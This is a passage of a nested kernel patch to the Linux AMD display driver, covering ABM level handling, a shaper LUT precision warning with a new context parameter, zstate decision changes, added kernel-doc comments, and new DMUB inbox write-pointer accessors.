+-		*val = dm_state->abm_level;
++		*val = (dm_state->abm_level != ABM_LEVEL_IMMEDIATE_DISABLE) ?
++			dm_state->abm_level : 0;
+ 		ret = 0;
+ 	}
+ 
+@@ -6274,7 +6275,8 @@ void amdgpu_dm_connector_funcs_reset(struct drm_connector *connector)
+ 		state->pbn = 0;
+ 
+ 		if (connector->connector_type == DRM_MODE_CONNECTOR_eDP)
+-			state->abm_level = amdgpu_dm_abm_level;
++			state->abm_level = amdgpu_dm_abm_level ?:
++				ABM_LEVEL_IMMEDIATE_DISABLE;
+ 
+ 		__drm_atomic_helper_connector_reset(connector, &state->base);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index f773a467fef54..7e775cec06927 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -499,9 +499,12 @@ enum dcn_zstate_support_state {
+ 	DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_DISALLOW,
+ };
+-/*
+- * For any clocks that may differ per pipe
+- * only the max is stored in this structure
++
++/**
++ * dc_clocks - DC pipe clocks
++ *
++ * For any clocks that may differ per pipe only the max is stored in this
++ * structure
+  */
+ struct dc_clocks {
+ 	int dispclk_khz;
+@@ -528,6 +531,16 @@ struct dc_clocks {
+ 	bool prev_p_state_change_support;
+ 	bool fclk_prev_p_state_change_support;
+ 	int num_ways;
++
++	/**
++	 * @fw_based_mclk_switching
++	 *
++	 * DC has a mechanism that leverage the variable refresh rate to switch
++	 * memory clock in cases that we have a large latency to achieve the
++	 * memory clock change and a short vblank window. DC has some
++	 * requirements to enable this feature, and this field describes if the
++	 * system support or not such a feature.
++	 */
+ 	bool fw_based_mclk_switching;
+ 	bool fw_based_mclk_switching_shut_down;
+ 	int prev_num_ways;
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_stream.h b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+index 364ff913527d8..31c6a80c216ff 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_stream.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_stream.h
+@@ -202,7 +202,18 @@ struct dc_stream_state {
+ 	bool use_vsc_sdp_for_colorimetry;
+ 	bool ignore_msa_timing_param;
+ 
++	/**
++	 * @allow_freesync:
++	 *
++	 * It say if Freesync is enabled or not.
++	 */
+ 	bool allow_freesync;
++
++	/**
++	 * @vrr_active_variable:
++	 *
++	 * It describes if VRR is in use.
++	 */
+ 	bool vrr_active_variable;
+ 	bool freesync_on_desktop;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+index 7a00fe525dfba..3538973bd0c6c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+@@ -308,7 +308,10 @@ bool cm_helper_convert_to_custom_float(
+ #define NUMBER_REGIONS     32
+ #define NUMBER_SW_SEGMENTS 16
+ 
+-bool cm_helper_translate_curve_to_hw_format(
++#define DC_LOGGER \
++		ctx->logger
++
++bool cm_helper_translate_curve_to_hw_format(struct dc_context *ctx,
+ 				const struct dc_transfer_func *output_tf,
+ 				struct pwl_params *lut_params, bool fixpoint)
+ {
+@@ -482,10 +485,18 @@ bool cm_helper_translate_curve_to_hw_format(
+ 		rgb->delta_green = dc_fixpt_sub(rgb_plus_1->green, rgb->green);
+ 		rgb->delta_blue  = dc_fixpt_sub(rgb_plus_1->blue,  rgb->blue);
+ 
++
+ 		if (fixpoint == true) {
+-			rgb->delta_red_reg   = dc_fixpt_clamp_u0d10(rgb->delta_red);
+-			rgb->delta_green_reg = dc_fixpt_clamp_u0d10(rgb->delta_green);
+-			rgb->delta_blue_reg  = dc_fixpt_clamp_u0d10(rgb->delta_blue);
++			uint32_t red_clamp = dc_fixpt_clamp_u0d14(rgb->delta_red);
++			uint32_t green_clamp = dc_fixpt_clamp_u0d14(rgb->delta_green);
++			uint32_t blue_clamp = dc_fixpt_clamp_u0d14(rgb->delta_blue);
++
++			if (red_clamp >> 10 || green_clamp >> 10 || blue_clamp >> 10)
++				DC_LOG_WARNING("Losing delta precision while programming shaper LUT.");
++
++			rgb->delta_red_reg   = red_clamp & 0x3ff;
++			rgb->delta_green_reg = green_clamp & 0x3ff;
++			rgb->delta_blue_reg  = blue_clamp & 0x3ff;
+ 			rgb->red_reg         = dc_fixpt_clamp_u0d14(rgb->red);
+ 			rgb->green_reg       = dc_fixpt_clamp_u0d14(rgb->green);
+ 			rgb->blue_reg        = dc_fixpt_clamp_u0d14(rgb->blue);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
+index 3b8cd7410498a..0a68b63d61260 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.h
+@@ -106,6 +106,7 @@ bool cm_helper_convert_to_custom_float(
+ 		bool fixpoint);
+ 
+ bool cm_helper_translate_curve_to_hw_format(
++		struct dc_context *ctx,
+ 		const struct dc_transfer_func *output_tf,
+ 		struct pwl_params *lut_params, bool fixpoint);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 3940271189632..d84579da64003 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -1867,7 +1867,7 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	/* dcn10_translate_regamma_to_hw_format takes 750us, only do it when full
+ 	 * update.
+ 	 */
+-	else if (cm_helper_translate_curve_to_hw_format(
++	else if (cm_helper_translate_curve_to_hw_format(dc->ctx,
+ 			stream->out_transfer_func,
+ 			&dpp->regamma_params, false)) {
+ 		dpp->funcs->dpp_program_regamma_pwl(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index fbc188812ccc9..9bd6a5716cdc1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -843,7 +843,7 @@ bool dcn20_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 			params = &stream->out_transfer_func->pwl;
+ 		else if (pipe_ctx->stream->out_transfer_func->type ==
+ 			TF_TYPE_DISTRIBUTED_POINTS &&
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(dc->ctx,
+ 			stream->out_transfer_func,
+ 			&mpc->blender_params, false))
+ 			params = &mpc->blender_params;
+@@ -872,7 +872,7 @@ bool dcn20_set_blend_lut(
+ 		if (plane_state->blend_tf->type == TF_TYPE_HWPWL)
+ 			blend_lut = &plane_state->blend_tf->pwl;
+ 		else if (plane_state->blend_tf->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(plane_state->ctx,
+ 					plane_state->blend_tf,
+ 					&dpp_base->regamma_params, false);
+ 			blend_lut = &dpp_base->regamma_params;
+@@ -894,7 +894,7 @@ bool dcn20_set_shaper_3dlut(
+ 		if (plane_state->in_shaper_func->type == TF_TYPE_HWPWL)
+ 			shaper_lut = &plane_state->in_shaper_func->pwl;
+ 		else if (plane_state->in_shaper_func->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(plane_state->ctx,
+ 					plane_state->in_shaper_func,
+ 					&dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
+index 6a3d3a0ec0a36..701c7d8bc038a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dwb_cm.c
+@@ -280,7 +280,7 @@ bool dwb3_ogam_set_input_transfer_func(
+ 	dwb_ogam_lut = kzalloc(sizeof(*dwb_ogam_lut), GFP_KERNEL);
+ 
+ 	if (dwb_ogam_lut) {
+-		cm_helper_translate_curve_to_hw_format(
++		cm_helper_translate_curve_to_hw_format(dwbc->ctx,
+ 			in_transfer_func_dwb_ogam,
+ 			dwb_ogam_lut, false);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index a1b312483d7f1..53262f6bc40b0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -91,8 +91,8 @@ bool dcn30_set_blend_lut(
+ 	return result;
+ }
+ 
+-static bool dcn30_set_mpc_shaper_3dlut(
+-	struct pipe_ctx *pipe_ctx, const struct dc_stream_state *stream)
++static bool dcn30_set_mpc_shaper_3dlut(struct pipe_ctx *pipe_ctx,
++				       const struct dc_stream_state *stream)
+ {
+ 	struct dpp *dpp_base = pipe_ctx->plane_res.dpp;
+ 	int mpcc_id = pipe_ctx->plane_res.hubp->inst;
+@@ -104,19 +104,18 @@ static bool dcn30_set_mpc_shaper_3dlut(
+ 	const struct pwl_params *shaper_lut = NULL;
+ 	//get the shaper lut params
+ 	if (stream->func_shaper) {
+-		if (stream->func_shaper->type == TF_TYPE_HWPWL)
++		if (stream->func_shaper->type == TF_TYPE_HWPWL) {
+ 			shaper_lut = &stream->func_shaper->pwl;
+-		else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
+-					stream->func_shaper,
+-					&dpp_base->shaper_params, true);
++		} else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
++			cm_helper_translate_curve_to_hw_format(stream->ctx, stream->func_shaper,
++							       &dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+ 		}
+ 	}
+ 
+ 	if (stream->lut3d_func &&
+-		stream->lut3d_func->state.bits.initialized == 1 &&
+-		stream->lut3d_func->state.bits.rmu_idx_valid == 1) {
++	    stream->lut3d_func->state.bits.initialized == 1 &&
++	    stream->lut3d_func->state.bits.rmu_idx_valid == 1) {
+ 		if (stream->lut3d_func->state.bits.rmu_mux_num == 0)
+ 			mpcc_id_projected = stream->lut3d_func->state.bits.mpc_rmu0_mux;
+ 		else if (stream->lut3d_func->state.bits.rmu_mux_num == 1)
+@@ -125,20 +124,22 @@ static bool dcn30_set_mpc_shaper_3dlut(
+ 			mpcc_id_projected = stream->lut3d_func->state.bits.mpc_rmu2_mux;
+ 		if (mpcc_id_projected != mpcc_id)
+ 			BREAK_TO_DEBUGGER();
+-		/*find the reason why logical layer assigned a differant mpcc_id into acquire_post_bldn_3dlut*/
++		/* find the reason why logical layer assigned a different
++		 * mpcc_id into acquire_post_bldn_3dlut
++		 */
+ 		acquired_rmu = mpc->funcs->acquire_rmu(mpc, mpcc_id,
+-				stream->lut3d_func->state.bits.rmu_mux_num);
++						       stream->lut3d_func->state.bits.rmu_mux_num);
+ 		if (acquired_rmu != stream->lut3d_func->state.bits.rmu_mux_num)
+ 			BREAK_TO_DEBUGGER();
+-		result = mpc->funcs->program_3dlut(mpc,
+-								&stream->lut3d_func->lut_3d,
+-								stream->lut3d_func->state.bits.rmu_mux_num);
++
++		result = mpc->funcs->program_3dlut(mpc, &stream->lut3d_func->lut_3d,
++						   stream->lut3d_func->state.bits.rmu_mux_num);
+ 		result = mpc->funcs->program_shaper(mpc, shaper_lut,
+-				stream->lut3d_func->state.bits.rmu_mux_num);
+-	} else
+-		/*loop through the available mux and release the requested mpcc_id*/
++						    stream->lut3d_func->state.bits.rmu_mux_num);
++	} else {
++		// loop through the available mux and release the requested mpcc_id
+ 		mpc->funcs->release_rmu(mpc, mpcc_id);
+-
++	}
+ 
+ 	return result;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 503ab45b4ace3..6b8abdb5c7f89 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -884,7 +884,7 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
+-	.minimum_z8_residency_time = 2000,
++	.minimum_z8_residency_time = 2100,
+ 	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 50b3547977281..bd75d3cba0980 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -530,7 +530,7 @@ static bool dcn32_set_mpc_shaper_3dlut(
+ 		if (stream->func_shaper->type == TF_TYPE_HWPWL)
+ 			shaper_lut = &stream->func_shaper->pwl;
+ 		else if (stream->func_shaper->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
++			cm_helper_translate_curve_to_hw_format(stream->ctx,
+ 					stream->func_shaper,
+ 					&dpp_base->shaper_params, true);
+ 			shaper_lut = &dpp_base->shaper_params;
+@@ -566,8 +566,7 @@ bool dcn32_set_mcm_luts(
+ 		if (plane_state->blend_tf->type == TF_TYPE_HWPWL)
+ 			lut_params = &plane_state->blend_tf->pwl;
+ 		else if (plane_state->blend_tf->type == TF_TYPE_DISTRIBUTED_POINTS) {
+-			cm_helper_translate_curve_to_hw_format(
+-					plane_state->blend_tf,
++			cm3_helper_translate_curve_to_hw_format(plane_state->blend_tf,
+ 					&dpp_base->regamma_params, false);
+ 			lut_params = &dpp_base->regamma_params;
+ 		}
+@@ -581,8 +580,7 @@ bool dcn32_set_mcm_luts(
+ 		else if (plane_state->in_shaper_func->type == TF_TYPE_DISTRIBUTED_POINTS) {
+ 			// TODO: dpp_base replace
+ 			ASSERT(false);
+-			cm_helper_translate_curve_to_hw_format(
+-					plane_state->in_shaper_func,
++			cm3_helper_translate_curve_to_hw_format(plane_state->in_shaper_func,
+ 					&dpp_base->shaper_params, true);
+ 			lut_params = &dpp_base->shaper_params;
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dc_features.h b/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
+index 74e86732e3010..2cbdd75429ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dc_features.h
+@@ -29,6 +29,13 @@
+ #define DC__PRESENT 1
+ #define DC__PRESENT__1 1
+ #define DC__NUM_DPP 4
++
++/**
++ * @DC__VOLTAGE_STATES:
++ *
++ * Define the maximum amount of states supported by the ASIC. Every ASIC has a
++ * specific number of states; this macro defines the maximum number of states.
++ */
+ #define DC__VOLTAGE_STATES 20
+ #define DC__NUM_DPP__4 1
+ #define DC__NUM_DPP__0_PRESENT 1
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index dbe5d2efa4a30..9d224bb2b3df6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -948,10 +948,8 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ {
+ 	int plane_count;
+ 	int i;
+-	unsigned int min_dst_y_next_start_us;
+ 
+ 	plane_count = 0;
+-	min_dst_y_next_start_us = 0;
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+ 			plane_count++;
+@@ -973,26 +971,15 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
+-		struct dc_stream_state *current_stream = context->streams[0];
+ 		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
+ 		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
+ 		bool is_pwrseq0 = link->link_index == 0;
+-		bool isFreesyncVideo;
+-
+-		isFreesyncVideo = current_stream->adjust.v_total_min == current_stream->adjust.v_total_max;
+-		isFreesyncVideo = isFreesyncVideo && current_stream->timing.v_total < current_stream->adjust.v_total_min;
+-		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-			if (context->res_ctx.pipe_ctx[i].stream == current_stream && isFreesyncVideo) {
+-				min_dst_y_next_start_us = context->res_ctx.pipe_ctx[i].dlg_regs.min_dst_y_next_start_us;
+-				break;
+-			}
+-		}
+ 
+ 		/* Don't support multi-plane configurations */
+ 		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || min_dst_y_next_start_us > 5000))
++		if (is_pwrseq0 && context->bw_ctx.dml.vba.StutterPeriod > 5000.0)
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+ 		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index c89b761bcb926..85e0d1c2a9085 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1788,6 +1788,7 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 	int i, pipe_idx, vlevel_temp = 0;
+ 	double dcfclk = dcn3_2_soc.clock_limits[0].dcfclk_mhz;
+ 	double dcfclk_from_validation = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
++	double dram_speed_from_validation = context->bw_ctx.dml.vba.DRAMSpeed;
+ 	double dcfclk_from_fw_based_mclk_switching = dcfclk_from_validation;
+ 	bool pstate_en = context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] !=
+ 			dm_dram_clock_change_unsupported;
+@@ -1921,7 +1922,7 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 	}
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_C].valid) {
+-		min_dram_speed_mts = context->bw_ctx.dml.vba.DRAMSpeed;
++		min_dram_speed_mts = dram_speed_from_validation;
+ 		min_dram_speed_mts_margin = 160;
+ 
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
+index f394b3f3922a8..0bffae95f3a29 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_enums.h
+@@ -105,14 +105,39 @@ enum source_macro_tile_size {
+ enum cursor_bpp {
+ 	dm_cur_2bit = 0, dm_cur_32bit = 1, dm_cur_64bit = 2
+ };
++
++/**
++ * @enum clock_change_support - It represents possible reasons to change the DRAM clock.
++ *
++ * DC may change the DRAM clock during its execution, and this enum tracks all
++ * the available methods. Note that every ASIC has their specific way to deal
++ * with these clock switch.
++ */
+ enum clock_change_support {
++	/**
++	 * @dm_dram_clock_change_uninitialized: If you see this, we might have
++	 * a code initialization issue
++	 */
+ 	dm_dram_clock_change_uninitialized = 0,
++
++	/**
++	 * @dm_dram_clock_change_vactive: Support DRAM switch in VActive
++	 */
+ 	dm_dram_clock_change_vactive,
++
++	/**
++	 * @dm_dram_clock_change_vblank: Support DRAM switch in VBlank
++	 */
+ 	dm_dram_clock_change_vblank,
++
+ 	dm_dram_clock_change_vactive_w_mall_full_frame,
+ 	dm_dram_clock_change_vactive_w_mall_sub_vp,
+ 	dm_dram_clock_change_vblank_w_mall_full_frame,
+ 	dm_dram_clock_change_vblank_w_mall_sub_vp,
++
++	/**
++	 * @dm_dram_clock_change_unsupported: Do not support DRAM switch
++	 */
+ 	dm_dram_clock_change_unsupported
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+index 2b34b02dbd459..81e53e67cd0b0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.h
+@@ -419,6 +419,15 @@ struct vba_vars_st {
+ 	double MinPixelChunkSizeBytes;
+ 	unsigned int DCCMetaBufferSizeBytes;
+ 	// Pipe/Plane Parameters
++
++	/** @VoltageLevel:
++	 * Every ASIC has a fixed number of DPM states, and some devices might
++	 * have some particular voltage configuration that does not map
++	 * directly to the DPM states. This field tells how many states the
++	 * target device supports; even though this field combines the DPM and
++	 * special SOC voltages, it mostly matches the total number of DPM
++	 * states.
++	 */
+ 	int VoltageLevel;
+ 	double FabricClock;
+ 	double DRAMSpeed;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/core_types.h b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+index 5fa7c4772af4f..d2b9e3f83fc3b 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/core_types.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+@@ -115,6 +115,13 @@ struct resource_funcs {
+ 				int vlevel);
+ 	void (*update_soc_for_wm_a)(
+ 				struct dc *dc, struct dc_state *context);
++
++	/**
++	 * @populate_dml_pipes - Populate pipe data struct
++	 *
++	 * Returns:
++	 * Total of pipes available in the specific ASIC.
++	 */
+ 	int (*populate_dml_pipes)(
+ 		struct dc *dc,
+ 		struct dc_state *context,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h b/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
+index cd2be729846b4..a819f0f97c5f3 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/hw_shared.h
+@@ -35,6 +35,13 @@
+  ******************************************************************************/
+ 
+ #define MAX_AUDIOS 7
++
++/**
++ * @MAX_PIPES:
++ *
++ * Every ASIC support a fixed number of pipes; MAX_PIPES defines a large number
++ * to be used inside loops and for determining array sizes.
++ */
+ #define MAX_PIPES 6
+ #define MAX_DIG_LINK_ENCODERS 7
+ #define MAX_DWB_PIPES	1
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index a21fe7b037d1f..aaabaab49809d 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -332,6 +332,8 @@ struct dmub_srv_hw_funcs {
+ 	void (*setup_mailbox)(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++	uint32_t (*get_inbox1_wptr)(struct dmub_srv *dmub);
++
+ 	uint32_t (*get_inbox1_rptr)(struct dmub_srv *dmub);
+ 
+ 	void (*set_inbox1_wptr)(struct dmub_srv *dmub, uint32_t wptr_offset);
+@@ -590,6 +592,18 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+  */
+ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub);
+ 
++/**
++ * dmub_srv_sync_inbox1() - sync sw state with hw state
++ * @dmub: the dmub service
++ *
++ * Sync sw state with hw state when resume from S0i3
++ *
++ * Return:
++ *   DMUB_STATUS_OK - success
++ *   DMUB_STATUS_INVALID - unspecified error
++ */
++enum dmub_status dmub_srv_sync_inbox1(struct dmub_srv *dmub);
++
+ /**
+  * dmub_srv_cmd_queue() - queues a command to the DMUB
+  * @dmub: the dmub service
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
+index a6540e27044d2..98dad0d47e72c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.c
+@@ -282,6 +282,11 @@ void dmub_dcn20_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn20_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn20_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
+index c2e5831ac52cc..1df128e57ed3b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn20.h
+@@ -202,6 +202,8 @@ void dmub_dcn20_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn20_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn20_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn20_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn20_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+index 89d24fb7024e2..5e952541e72d5 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+@@ -242,6 +242,11 @@ void dmub_dcn31_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn31_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn31_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+index eb62410941473..89c5a948b67d5 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+@@ -204,6 +204,8 @@ void dmub_dcn31_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn31_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn31_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn31_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn31_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index 9c20516be066c..d2f03f797279f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -266,6 +266,11 @@ void dmub_dcn32_setup_mailbox(struct dmub_srv *dmub,
+ 	REG_WRITE(DMCUB_INBOX1_SIZE, inbox1->top - inbox1->base);
+ }
+ 
++uint32_t dmub_dcn32_get_inbox1_wptr(struct dmub_srv *dmub)
++{
++	return REG_READ(DMCUB_INBOX1_WPTR);
++}
++
+ uint32_t dmub_dcn32_get_inbox1_rptr(struct dmub_srv *dmub)
+ {
+ 	return REG_READ(DMCUB_INBOX1_RPTR);
